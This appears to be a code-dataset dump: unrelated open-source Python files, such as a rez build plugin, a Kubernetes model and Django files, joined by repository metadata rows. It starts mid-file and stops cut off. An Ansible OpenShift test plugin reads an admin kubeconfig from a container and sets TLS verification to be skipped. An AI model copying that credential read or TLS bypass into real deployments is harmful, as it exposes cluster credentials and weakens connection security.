def get_version_lineage_for_tool(self, repository_id, repository_metadata, guid):
"""
Return the tool version lineage chain in descendant order for the received
guid contained in the received repsitory_metadata.tool_versions. This function
is called only from the Tool Shed.
"""
repository = repository_util.get_repository_by_id(self.app, repository_id)
repo = repository.hg_repo
# Initialize the tool lineage
version_lineage = [guid]
# Get all ancestor guids of the received guid.
current_child_guid = guid
for changeset in hg_util.reversed_upper_bounded_changelog(repo, repository_metadata.changeset_revision):
ctx = repo[changeset]
rm = metadata_util.get_repository_metadata_by_changeset_revision(self.app, repository_id, str(ctx))
if rm:
parent_guid = rm.tool_versions.get(current_child_guid, None)
if parent_guid:
version_lineage.append(parent_guid)
current_child_guid = parent_guid
# Get all descendant guids of the received guid.
current_parent_guid = guid
for changeset in hg_util.reversed_lower_upper_bounded_changelog(repo,
repository_metadata.changeset_revision,
repository.tip()):
ctx = repo[changeset]
rm = metadata_util.get_repository_metadata_by_changeset_revision(self.app, repository_id, str(ctx))
if rm:
tool_versions = rm.tool_versions
for child_guid, parent_guid in tool_versions.items():
if parent_guid == current_parent_guid:
version_lineage.insert(0, child_guid)
current_parent_guid = child_guid
break
return version_lineage
| 46.637681 | 125 | 0.635177 |
acfb65f8f8e26ed3f5597cded45cd7675599d5c7 | 348 | py | Python | prepare.py | lolloberga/Capsian-Engine | 086e0fee9392df1642c8199e61e2e24fb6b81e77 | [
"Apache-2.0"
] | 10 | 2020-09-26T15:10:48.000Z | 2022-02-03T19:13:56.000Z | prepare.py | lolloberga/Capsian-Engine | 086e0fee9392df1642c8199e61e2e24fb6b81e77 | [
"Apache-2.0"
] | 2 | 2020-09-29T19:13:50.000Z | 2021-12-24T12:04:29.000Z | prepare.py | lolloberga/Capsian-Engine | 086e0fee9392df1642c8199e61e2e24fb6b81e77 | [
"Apache-2.0"
] | 3 | 2021-03-05T20:14:38.000Z | 2022-01-26T21:34:36.000Z | from os import system
print("Starting Capsian Preparation Tool...")
print("This script will install all the dependencies you need")
input("Press enter to continue or lcose to terminate ")
system("pip install pyglet==1.5.6")
system("pip install PyOpenGL")
system("pip install pyinstaller")
input("Installation completed!\nPress enter to exit ")
| 26.769231 | 63 | 0.764368 |
acfb668ec545d6bb031bdd72fccf3275f8580f81 | 9,685 | py | Python | src/rezplugins/build_system/custom.py | maxnbk/rez | 762c5cfce17eabde67eb5582498406eb3544daf0 | [
"Apache-2.0"
] | null | null | null | src/rezplugins/build_system/custom.py | maxnbk/rez | 762c5cfce17eabde67eb5582498406eb3544daf0 | [
"Apache-2.0"
] | null | null | null | src/rezplugins/build_system/custom.py | maxnbk/rez | 762c5cfce17eabde67eb5582498406eb3544daf0 | [
"Apache-2.0"
] | 1 | 2020-09-24T08:33:43.000Z | 2020-09-24T08:33:43.000Z | # Copyright Contributors to the Rez project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Package-defined build command
"""
try:
from builtins import str
from builtins import map
except ImportError:
pass
from pipes import quote
import functools
import os.path
import sys
import os
from rez.build_system import BuildSystem
from rez.build_process import BuildType
from rez.utils.execution import create_forwarding_script
from rez.packages import get_developer_package
from rez.resolved_context import ResolvedContext
from rez.exceptions import PackageMetadataError
from rez.utils.colorize import heading, Printer
from rez.utils.logging_ import print_warning
from rez.vendor.six import six
from rez.config import config
basestring = six.string_types[0]
class CustomBuildSystem(BuildSystem):
"""This build system runs the 'build_command' defined in a package.py.
For example, consider the package.py snippet:
build_commands = "bash {root}/build.sh {install}"
This will run the given bash command in the build path - this is typically
located somewhere under the 'build' dir under the root dir containing the
package.py.
The following variables are available for expansion:
* root: The source directory (the one containing the package.py).
* install: 'install' if an install is occurring, or the empty string ('')
otherwise;
* build_path: The build path (this will also be the cwd);
* install_path: Full path to install destination;
* name: Name of the package getting built;
* variant_index: Index of the current variant getting built, or an empty
string ('') if no variants are present.
* version: Package version currently getting built.
"""
@classmethod
def name(cls):
return "custom"
@classmethod
def is_valid_root(cls, path, package=None):
if package is None:
try:
package = get_developer_package(path)
except PackageMetadataError:
return False
return (getattr(package, "build_command", None) is not None)
def __init__(self, working_dir, opts=None, package=None, write_build_scripts=False,
verbose=False, build_args=[], child_build_args=[]):
super(CustomBuildSystem, self).__init__(
working_dir,
opts=opts,
package=package,
write_build_scripts=write_build_scripts,
verbose=verbose,
build_args=build_args,
child_build_args=child_build_args)
@classmethod
def bind_cli(cls, parser, group):
"""
Uses a 'parse_build_args.py' file to add options, if found.
"""
try:
with open("./parse_build_args.py") as f:
source = f.read()
except:
return
# detect what extra args have been added
before_args = set(x.dest for x in parser._actions)
try:
exec(source, {"parser": group})
except Exception as e:
print_warning("Error in ./parse_build_args.py: %s" % str(e))
after_args = set(x.dest for x in parser._actions)
extra_args = after_args - before_args
# store extra args onto parser so we can get to it in self.build()
setattr(parser, "_rezbuild_extra_args", list(extra_args))
def build(self, context, variant, build_path, install_path, install=False,
build_type=BuildType.local):
"""Perform the build.
Note that most of the func args aren't used here - that's because this
info is already passed to the custom build command via environment
variables.
"""
ret = {}
if self.write_build_scripts:
# write out the script that places the user in a build env
build_env_script = os.path.join(build_path, "build-env")
create_forwarding_script(build_env_script,
module=("build_system", "custom"),
func_name="_FWD__spawn_build_shell",
working_dir=self.working_dir,
build_path=build_path,
variant_index=variant.index,
install=install,
install_path=install_path)
ret["success"] = True
ret["build_env_script"] = build_env_script
return ret
# get build command
command = self.package.build_command
# False just means no build command
if command is False:
ret["success"] = True
return ret
def expand(txt):
return txt.format(build_path=build_path,
install="install" if install else '',
install_path=install_path,
name=self.package.name,
root=self.package.root,
variant_index=variant.index if variant.index is not None else '',
version=self.package.version).strip()
if isinstance(command, basestring):
if self.build_args:
command = command + ' ' + ' '.join(map(quote, self.build_args))
command = expand(command)
cmd_str = command
else: # list
command = command + self.build_args
command = list(map(expand, command))
cmd_str = ' '.join(map(quote, command))
if self.verbose:
pr = Printer(sys.stdout)
pr("Running build command: %s" % cmd_str, heading)
# run the build command
post_actions_callback = functools.partial(
self.add_pre_build_commands,
variant=variant,
build_type=build_type,
install=install,
build_path=build_path,
install_path=install_path
)
def _actions_callback(executor):
self._add_build_actions(
executor,
context=context,
package=self.package,
variant=variant,
build_type=build_type,
install=install,
build_path=build_path,
install_path=install_path
)
if self.opts:
# write args defined in ./parse_build_args.py out as env vars
extra_args = getattr(self.opts.parser, "_rezbuild_extra_args", [])
for key, value in list(vars(self.opts).items()):
if key in extra_args:
varname = "__PARSE_ARG_%s" % key.upper()
# do some value conversions
if isinstance(value, bool):
value = 1 if value else 0
elif isinstance(value, (list, tuple)):
value = list(map(str, value))
value = list(map(quote, value))
value = ' '.join(value)
executor.env[varname] = value
retcode, _, _ = context.execute_shell(
command=command,
block=True,
cwd=build_path,
actions_callback=_actions_callback,
post_actions_callback=post_actions_callback
)
ret["success"] = (not retcode)
return ret
@classmethod
def _add_build_actions(cls, executor, context, package, variant,
build_type, install, build_path, install_path=None):
cls.add_standard_build_actions(
executor=executor,
context=context,
variant=variant,
build_type=build_type,
install=install,
build_path=build_path,
install_path=install_path
)
def _FWD__spawn_build_shell(working_dir, build_path, variant_index, install,
install_path=None):
# This spawns a shell that the user can run the build command in directly
context = ResolvedContext.load(os.path.join(build_path, "build.rxt"))
package = get_developer_package(working_dir)
variant = package.get_variant(variant_index)
config.override("prompt", "BUILD>")
actions_callback = functools.partial(
CustomBuildSystem._add_build_actions,
context=context,
package=package,
variant=variant,
build_type=BuildType.local,
install=install,
build_path=build_path,
install_path=install_path
)
post_actions_callback = functools.partial(
CustomBuildSystem.add_pre_build_commands,
variant=variant,
build_type=BuildType.local,
install=install,
build_path=build_path,
install_path=install_path
)
retcode, _, _ = context.execute_shell(
block=True,
cwd=build_path,
actions_callback=actions_callback,
post_actions_callback=post_actions_callback
)
sys.exit(retcode)
def register_plugin():
return CustomBuildSystem
| 34.466192 | 95 | 0.601859 |
acfb66d8094d0eba35d6b8abdb68fdfce658c1cf | 5,993 | py | Python | kubernetes/client/models/v1_endpoint_address.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 1 | 2018-10-20T19:37:57.000Z | 2018-10-20T19:37:57.000Z | kubernetes/client/models/v1_endpoint_address.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | null | null | null | kubernetes/client/models/v1_endpoint_address.py | reymont/python | 02a3a31c630c305527b328af49724f348fbdae15 | [
"Apache-2.0"
] | 2 | 2018-07-27T19:39:34.000Z | 2020-12-25T02:48:27.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.11.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1EndpointAddress(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'hostname': 'str',
'ip': 'str',
'node_name': 'str',
'target_ref': 'V1ObjectReference'
}
attribute_map = {
'hostname': 'hostname',
'ip': 'ip',
'node_name': 'nodeName',
'target_ref': 'targetRef'
}
def __init__(self, hostname=None, ip=None, node_name=None, target_ref=None):
"""
V1EndpointAddress - a model defined in Swagger
"""
self._hostname = None
self._ip = None
self._node_name = None
self._target_ref = None
self.discriminator = None
if hostname is not None:
self.hostname = hostname
self.ip = ip
if node_name is not None:
self.node_name = node_name
if target_ref is not None:
self.target_ref = target_ref
@property
def hostname(self):
"""
Gets the hostname of this V1EndpointAddress.
The Hostname of this endpoint
:return: The hostname of this V1EndpointAddress.
:rtype: str
"""
return self._hostname
@hostname.setter
def hostname(self, hostname):
"""
Sets the hostname of this V1EndpointAddress.
The Hostname of this endpoint
:param hostname: The hostname of this V1EndpointAddress.
:type: str
"""
self._hostname = hostname
@property
def ip(self):
"""
Gets the ip of this V1EndpointAddress.
The IP of this endpoint. May not be loopback (127.0.0.0/8), link-local (169.254.0.0/16), or link-local multicast ((224.0.0.0/24). IPv6 is also accepted but not fully supported on all platforms. Also, certain kubernetes components, like kube-proxy, are not IPv6 ready.
:return: The ip of this V1EndpointAddress.
:rtype: str
"""
return self._ip
@ip.setter
def ip(self, ip):
"""
Sets the ip of this V1EndpointAddress.
The IP of this endpoint. May not be loopback (127.0.0.0/8), link-local (169.254.0.0/16), or link-local multicast ((224.0.0.0/24). IPv6 is also accepted but not fully supported on all platforms. Also, certain kubernetes components, like kube-proxy, are not IPv6 ready.
:param ip: The ip of this V1EndpointAddress.
:type: str
"""
if ip is None:
raise ValueError("Invalid value for `ip`, must not be `None`")
self._ip = ip
@property
def node_name(self):
"""
Gets the node_name of this V1EndpointAddress.
Optional: Node hosting this endpoint. This can be used to determine endpoints local to a node.
:return: The node_name of this V1EndpointAddress.
:rtype: str
"""
return self._node_name
@node_name.setter
def node_name(self, node_name):
"""
Sets the node_name of this V1EndpointAddress.
Optional: Node hosting this endpoint. This can be used to determine endpoints local to a node.
:param node_name: The node_name of this V1EndpointAddress.
:type: str
"""
self._node_name = node_name
@property
def target_ref(self):
"""
Gets the target_ref of this V1EndpointAddress.
Reference to object providing the endpoint.
:return: The target_ref of this V1EndpointAddress.
:rtype: V1ObjectReference
"""
return self._target_ref
@target_ref.setter
def target_ref(self, target_ref):
"""
Sets the target_ref of this V1EndpointAddress.
Reference to object providing the endpoint.
:param target_ref: The target_ref of this V1EndpointAddress.
:type: V1ObjectReference
"""
self._target_ref = target_ref
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1EndpointAddress):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 28.268868 | 275 | 0.579843 |
acfb6758d861a7bacaa582d530693ee1f07ca52a | 7,381 | py | Python | test/runner/lib/cloud/openshift.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 37 | 2017-08-15T15:02:43.000Z | 2021-07-23T03:44:31.000Z | test/runner/lib/cloud/openshift.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 12 | 2018-01-10T05:25:25.000Z | 2021-11-28T06:55:48.000Z | test/runner/lib/cloud/openshift.py | Container-Projects/ansible-provider-docs | 100b695b0b0c4d8d08af362069557ffc735d0d7e | [
"PSF-2.0",
"BSD-2-Clause",
"MIT"
] | 49 | 2017-08-15T09:52:13.000Z | 2022-03-21T17:11:54.000Z | """OpenShift plugin for integration tests."""
from __future__ import absolute_import, print_function
import json
import os
import re
import time
from lib.cloud import (
CloudProvider,
CloudEnvironment,
)
from lib.util import (
find_executable,
ApplicationError,
display,
SubprocessError,
)
from lib.http import (
HttpClient,
)
from lib.docker_util import (
docker_exec,
docker_run,
docker_rm,
docker_inspect,
docker_pull,
docker_network_inspect,
get_docker_container_id,
)
class OpenShiftCloudProvider(CloudProvider):
"""OpenShift cloud provider plugin. Sets up cloud resources before delegation."""
DOCKER_CONTAINER_NAME = 'openshift-origin'
def __init__(self, args):
"""
:type args: TestConfig
"""
super(OpenShiftCloudProvider, self).__init__(args, config_extension='.kubeconfig')
# The image must be pinned to a specific version to guarantee CI passes with the version used.
self.image = 'openshift/origin:v3.7.1'
self.container_name = ''
def filter(self, targets, exclude):
"""Filter out the cloud tests when the necessary config and resources are not available.
:type targets: tuple[TestTarget]
:type exclude: list[str]
"""
if os.path.isfile(self.config_static_path):
return
docker = find_executable('docker', required=False)
if docker:
return
skip = 'cloud/%s/' % self.platform
skipped = [target.name for target in targets if skip in target.aliases]
if skipped:
exclude.append(skip)
display.warning('Excluding tests marked "%s" which require the "docker" command or config (see "%s"): %s'
% (skip.rstrip('/'), self.config_template_path, ', '.join(skipped)))
def setup(self):
"""Setup the cloud resource before delegation and register a cleanup callback."""
super(OpenShiftCloudProvider, self).setup()
if self._use_static_config():
self._setup_static()
else:
self._setup_dynamic()
def get_remote_ssh_options(self):
"""Get any additional options needed when delegating tests to a remote instance via SSH.
:rtype: list[str]
"""
if self.managed:
return ['-R', '8443:localhost:8443']
return []
def get_docker_run_options(self):
"""Get any additional options needed when delegating tests to a docker container.
:rtype: list[str]
"""
if self.managed:
return ['--link', self.DOCKER_CONTAINER_NAME]
return []
def cleanup(self):
"""Clean up the cloud resource and any temporary configuration files after tests complete."""
if self.container_name:
docker_rm(self.args, self.container_name)
super(OpenShiftCloudProvider, self).cleanup()
def _setup_static(self):
"""Configure OpenShift tests for use with static configuration."""
with open(self.config_static_path, 'r') as config_fd:
config = config_fd.read()
match = re.search(r'^ *server: (?P<server>.*)$', config, flags=re.MULTILINE)
if match:
endpoint = match.group('server')
self._wait_for_service(endpoint)
else:
display.warning('Could not find OpenShift endpoint in kubeconfig. Skipping check for OpenShift service availability.')
def _setup_dynamic(self):
"""Create a OpenShift container using docker."""
self.container_name = self.DOCKER_CONTAINER_NAME
results = docker_inspect(self.args, self.container_name)
if results and not results[0]['State']['Running']:
docker_rm(self.args, self.container_name)
results = []
if results:
display.info('Using the existing OpenShift docker container.', verbosity=1)
else:
display.info('Starting a new OpenShift docker container.', verbosity=1)
docker_pull(self.args, self.image)
cmd = ['start', 'master', '--listen', 'https://0.0.0.0:8443']
docker_run(self.args, self.image, ['-d', '-p', '8443:8443', '--name', self.container_name], cmd)
container_id = get_docker_container_id()
if container_id:
display.info('Running in docker container: %s' % container_id, verbosity=1)
host = self._get_container_address()
display.info('Found OpenShift container address: %s' % host, verbosity=1)
else:
host = 'localhost'
port = 8443
endpoint = 'https://%s:%s/' % (host, port)
self._wait_for_service(endpoint)
if self.args.explain:
config = '# Unknown'
else:
if self.args.docker:
host = self.DOCKER_CONTAINER_NAME
server = 'https://%s:%s' % (host, port)
config = self._get_config(server)
self._write_config(config)
def _get_container_address(self):
networks = docker_network_inspect(self.args, 'bridge')
try:
bridge = [network for network in networks if network['Name'] == 'bridge'][0]
containers = bridge['Containers']
container = [containers[container] for container in containers if containers[container]['Name'] == self.DOCKER_CONTAINER_NAME][0]
return re.sub(r'/[0-9]+$', '', container['IPv4Address'])
except Exception:
display.error('Failed to process the following docker network inspect output:\n%s' %
json.dumps(networks, indent=4, sort_keys=True))
raise
def _wait_for_service(self, endpoint):
"""Wait for the OpenShift service endpoint to accept connections.
:type endpoint: str
"""
if self.args.explain:
return
client = HttpClient(self.args, always=True, insecure=True)
endpoint = endpoint
for dummy in range(1, 30):
display.info('Waiting for OpenShift service: %s' % endpoint, verbosity=1)
try:
client.get(endpoint)
return
except SubprocessError:
pass
time.sleep(10)
raise ApplicationError('Timeout waiting for OpenShift service.')
def _get_config(self, server):
"""Get OpenShift config from container.
:type server: str
:rtype: dict[str, str]
"""
cmd = ['cat', '/var/lib/origin/openshift.local.config/master/admin.kubeconfig']
stdout, dummy = docker_exec(self.args, self.container_name, cmd, capture=True)
config = stdout
config = re.sub(r'^( *)certificate-authority-data: .*$', r'\1insecure-skip-tls-verify: true', config, flags=re.MULTILINE)
config = re.sub(r'^( *)server: .*$', r'\1server: %s' % server, config, flags=re.MULTILINE)
return config
class OpenShiftCloudEnvironment(CloudEnvironment):
"""OpenShift cloud environment plugin. Updates integration test environment after delegation."""
def configure_environment(self, env, cmd):
"""
:type env: dict[str, str]
:type cmd: list[str]
"""
changes = dict(
K8S_AUTH_KUBECONFIG=self.config_path,
)
env.update(changes)
| 32.804444 | 141 | 0.615364 |
acfb68f7be8fd4e69f5359bf73ddfdc4d4750494 | 665 | py | Python | manage.py | awhigham9/GatorWiki | 382bdacb86fccb1a365ffaed2cb5a86441e819e6 | [
"MIT"
] | 6 | 2021-09-09T20:38:24.000Z | 2021-10-06T03:51:40.000Z | manage.py | awhigham9/GatorWiki | 382bdacb86fccb1a365ffaed2cb5a86441e819e6 | [
"MIT"
] | 16 | 2021-09-17T17:02:27.000Z | 2021-11-07T17:46:41.000Z | manage.py | awhigham9/GatorWiki | 382bdacb86fccb1a365ffaed2cb5a86441e819e6 | [
"MIT"
] | 5 | 2021-09-09T20:38:27.000Z | 2021-09-24T17:33:23.000Z | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'gatorwiki.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.913043 | 73 | 0.679699 |
acfb693e5623104b21716be98a85348a928a8a0f | 447 | py | Python | portal/users/migrations/0007_auto_20210223_1901.py | LDSSA/portal | 9561da1e262678fe68dcf51c66007c0fb13eb51a | [
"MIT"
] | 2 | 2020-11-09T03:48:36.000Z | 2021-07-02T14:30:09.000Z | portal/users/migrations/0007_auto_20210223_1901.py | LDSSA/portal | 9561da1e262678fe68dcf51c66007c0fb13eb51a | [
"MIT"
] | 132 | 2020-04-25T15:57:56.000Z | 2022-03-10T19:15:51.000Z | portal/users/migrations/0007_auto_20210223_1901.py | LDSSA/portal | 9561da1e262678fe68dcf51c66007c0fb13eb51a | [
"MIT"
] | 1 | 2020-10-24T16:15:57.000Z | 2020-10-24T16:15:57.000Z | # Generated by Django 3.1.7 on 2021-02-23 19:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("users", "0006_user_logo"),
]
operations = [
migrations.AlterField(
model_name="user",
name="first_name",
field=models.CharField(
blank=True, max_length=150, verbose_name="first name"
),
),
]
| 21.285714 | 69 | 0.565996 |
acfb69f3995d23c43850a5277464921d788fd5c5 | 578 | py | Python | common/validators.py | opendream/asip | 20583aca6393102d425401d55ea32ac6b78be048 | [
"MIT"
] | null | null | null | common/validators.py | opendream/asip | 20583aca6393102d425401d55ea32ac6b78be048 | [
"MIT"
] | 8 | 2020-03-24T17:11:49.000Z | 2022-01-13T01:18:11.000Z | common/validators.py | opendream/asip | 20583aca6393102d425401d55ea32ac6b78be048 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import resolve, Resolver404
def validate_reserved_url(value, resp=False):
try:
view, args, kwargs = resolve('/%s/' % value)
except Resolver404:
return True
if view.func_name not in settings.OWNER_URL_VIEWS:
if resp:
return False
else:
raise ValidationError(_('This permalink is already in use'), params={'value': value})
return True | 30.421053 | 97 | 0.698962 |
acfb6a0f1d891e3ccc31cfd1f9d0cb9dcaa303c5 | 1,086 | py | Python | 11_display/eg_11_10_display_draw_string_align.py | byrobot-python/e_drone_examples | fca3ef69f45299f0e80df52ac303e2a1388b2b61 | [
"MIT"
] | null | null | null | 11_display/eg_11_10_display_draw_string_align.py | byrobot-python/e_drone_examples | fca3ef69f45299f0e80df52ac303e2a1388b2b61 | [
"MIT"
] | null | null | null | 11_display/eg_11_10_display_draw_string_align.py | byrobot-python/e_drone_examples | fca3ef69f45299f0e80df52ac303e2a1388b2b61 | [
"MIT"
] | null | null | null | import random
from time import sleep
from e_drone.drone import *
from e_drone.protocol import *
if __name__ == '__main__':
drone = Drone()
drone.open()
header = Header()
header.data_type = DataType.DISPLAY_DRAW_STRING_ALIGN
header.length = DisplayDrawStringAlign.get_size()
header.from_ = DeviceType.BASE
header.to_ = DeviceType.CONTROLLER
data = DisplayDrawStringAlign()
for i in range(0, 100, 1):
data.x_start = 0
data.x_end = 127
data.y = int(random.randint(0, 63))
data.align = DisplayAlign(int(random.randint(0, 2)))
data.font = DisplayFont(int(random.randint(0, 1)))
data.pixel = DisplayPixel(int(random.randint(0, 1)))
data.message = "LOVE"
header.length = DisplayDrawStringAlign.get_size() + len(data.message)
data_array = drone.transfer(header, data)
print("{0} / {1}".format(i, convert_byte_array_to_string(data_array)))
sleep(0.03)
drone.close() | 27.846154 | 80 | 0.598527 |
acfb6afc5d78a3e4ea07b92db60d93bf5c04aef6 | 6,742 | py | Python | bindings/python/ensmallen_graph/datasets/string/prevotellastercorea.py | caufieldjh/ensmallen_graph | 14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a | [
"MIT"
] | null | null | null | bindings/python/ensmallen_graph/datasets/string/prevotellastercorea.py | caufieldjh/ensmallen_graph | 14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a | [
"MIT"
] | null | null | null | bindings/python/ensmallen_graph/datasets/string/prevotellastercorea.py | caufieldjh/ensmallen_graph | 14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a | [
"MIT"
] | null | null | null | """
This file offers the methods to automatically retrieve the graph Prevotella stercorea.
The graph is automatically retrieved from the STRING repository.
Report
---------------------
At the time of rendering these methods (please see datetime below), the graph
had the following characteristics:
Datetime: 2021-02-02 22:07:10.070563
The undirected graph Prevotella stercorea has 2962 nodes and 149720 weighted
edges, of which none are self-loops. The graph is dense as it has a density
of 0.03414 and has 38 connected components, where the component with most
nodes has 2857 nodes and the component with the least nodes has 2 nodes.
The graph median node degree is 75, the mean node degree is 101.09, and
the node degree mode is 3. The top 5 most central nodes are 1002367.HMPREF0673_00915
(degree 885), 1002367.HMPREF0673_02100 (degree 834), 1002367.HMPREF0673_02060
(degree 696), 1002367.HMPREF0673_00648 (degree 695) and 1002367.HMPREF0673_02386
(degree 648).
References
---------------------
Please cite the following if you use the data:
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
Usage example
----------------------
The usage of this graph is relatively straightforward:
.. code:: python
# First import the function to retrieve the graph from the datasets
from ensmallen_graph.datasets.string import PrevotellaStercorea
# Then load the graph
graph = PrevotellaStercorea()
# Finally, you can do anything with it, for instance, compute its report:
print(graph)
# If you need to run a link prediction task with validation,
# you can split the graph using a connected holdout as follows:
train_graph, validation_graph = graph.connected_holdout(
# You can use an 80/20 split the holdout, for example.
train_size=0.8,
# The random state is used to reproduce the holdout.
random_state=42,
# Wether to show a loading bar.
verbose=True
)
# Remember that, if you need, you can enable the memory-time trade-offs:
train_graph.enable(
vector_sources=True,
vector_destinations=True,
vector_outbounds=True
)
# Consider using the methods made available in the Embiggen package
# to run graph embedding or link prediction tasks.
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen_graph import EnsmallenGraph # pylint: disable=import-error
def PrevotellaStercorea(
directed: bool = False,
verbose: int = 2,
cache_path: str = "graphs/string",
**additional_graph_kwargs: Dict
) -> EnsmallenGraph:
"""Return new instance of the Prevotella stercorea graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False,
Wether to load the graph as directed or undirected.
By default false.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache_path: str = "graphs",
Where to store the downloaded graphs.
additional_graph_kwargs: Dict,
Additional graph kwargs.
Returns
-----------------------
Instace of Prevotella stercorea graph.
Report
---------------------
At the time of rendering these methods (please see datetime below), the graph
had the following characteristics:
Datetime: 2021-02-02 22:07:10.070563
The undirected graph Prevotella stercorea has 2962 nodes and 149720 weighted
edges, of which none are self-loops. The graph is dense as it has a density
of 0.03414 and has 38 connected components, where the component with most
nodes has 2857 nodes and the component with the least nodes has 2 nodes.
The graph median node degree is 75, the mean node degree is 101.09, and
the node degree mode is 3. The top 5 most central nodes are 1002367.HMPREF0673_00915
(degree 885), 1002367.HMPREF0673_02100 (degree 834), 1002367.HMPREF0673_02060
(degree 696), 1002367.HMPREF0673_00648 (degree 695) and 1002367.HMPREF0673_02386
(degree 648).
References
---------------------
Please cite the following if you use the data:
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
Usage example
----------------------
The usage of this graph is relatively straightforward:
.. code:: python
# First import the function to retrieve the graph from the datasets
from ensmallen_graph.datasets.string import PrevotellaStercorea
# Then load the graph
graph = PrevotellaStercorea()
# Finally, you can do anything with it, for instance, compute its report:
print(graph)
# If you need to run a link prediction task with validation,
# you can split the graph using a connected holdout as follows:
train_graph, validation_graph = graph.connected_holdout(
# You can use an 80/20 split the holdout, for example.
train_size=0.8,
# The random state is used to reproduce the holdout.
random_state=42,
# Wether to show a loading bar.
verbose=True
)
# Remember that, if you need, you can enable the memory-time trade-offs:
train_graph.enable(
vector_sources=True,
vector_destinations=True,
vector_outbounds=True
)
# Consider using the methods made available in the Embiggen package
# to run graph embedding or link prediction tasks.
"""
return AutomaticallyRetrievedGraph(
graph_name="PrevotellaStercorea",
dataset="string",
directed=directed,
verbose=verbose,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| 35.298429 | 223 | 0.706022 |
acfb6b340bc5088de9a020fcf907f83beb45e702 | 4,347 | py | Python | codes/preprocess/create_bicubic_dataset.py | YamSquirrel/realsr_test | 60c52cfc7091eeeff0b8d25c4fd3819584517212 | [
"Apache-2.0"
] | 1 | 2022-03-15T07:42:53.000Z | 2022-03-15T07:42:53.000Z | codes/preprocess/create_bicubic_dataset.py | openmynet/realsr_test | 60c52cfc7091eeeff0b8d25c4fd3819584517212 | [
"Apache-2.0"
] | null | null | null | codes/preprocess/create_bicubic_dataset.py | openmynet/realsr_test | 60c52cfc7091eeeff0b8d25c4fd3819584517212 | [
"Apache-2.0"
] | 1 | 2022-03-15T07:42:47.000Z | 2022-03-15T07:42:47.000Z | import argparse
import os
import torch.utils.data
import yaml
import utils
from PIL import Image
import torchvision.transforms.functional as TF
from tqdm import tqdm
parser = argparse.ArgumentParser(description='Apply the trained model to create a dataset')
parser.add_argument('--checkpoint', default=None, type=str, help='checkpoint model to use')
parser.add_argument('--artifacts', default='', type=str, help='selecting different artifacts type')
parser.add_argument('--name', default='', type=str, help='additional string added to folder path')
parser.add_argument('--dataset', default='df2k', type=str, help='selecting different datasets')
parser.add_argument('--track', default='train', type=str, help='selecting train or valid track')
parser.add_argument('--num_res_blocks', default=8, type=int, help='number of ResNet blocks')
